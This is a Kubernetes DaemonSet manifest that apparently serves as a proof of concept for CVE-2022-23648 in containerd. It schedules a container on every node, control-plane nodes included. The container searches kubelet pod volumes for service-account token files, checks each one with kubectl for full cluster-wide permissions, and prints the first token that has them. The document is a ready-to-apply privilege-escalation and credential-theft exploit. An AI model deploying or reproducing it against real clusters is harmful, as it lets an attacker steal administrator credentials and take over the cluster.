apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: poctest
  namespace: default
  labels:
    app: poctest
spec:
  selector:
    matchLabels:
      app: poctest
  template:
    metadata:
      labels:
        app: poctest
    spec:
      tolerations:
      - key: node-role.kubernetes.io/master
        operator: Exists
        effect: NoSchedule
      containers:
      - name: poctest
        image: ghcr.io/bgeesaman/cve-2022-23648-poc:v1 
        command: ["/bin/bash", "-c", "--"]
        args: [ "for i in $(find /var/lib/kubelet/pods/*/volumes/* -name 'token' -type f); do kubectl --token=`cat $i` auth can-i '*' '*' -A | grep -q yes && cat $i && break; done" ] 
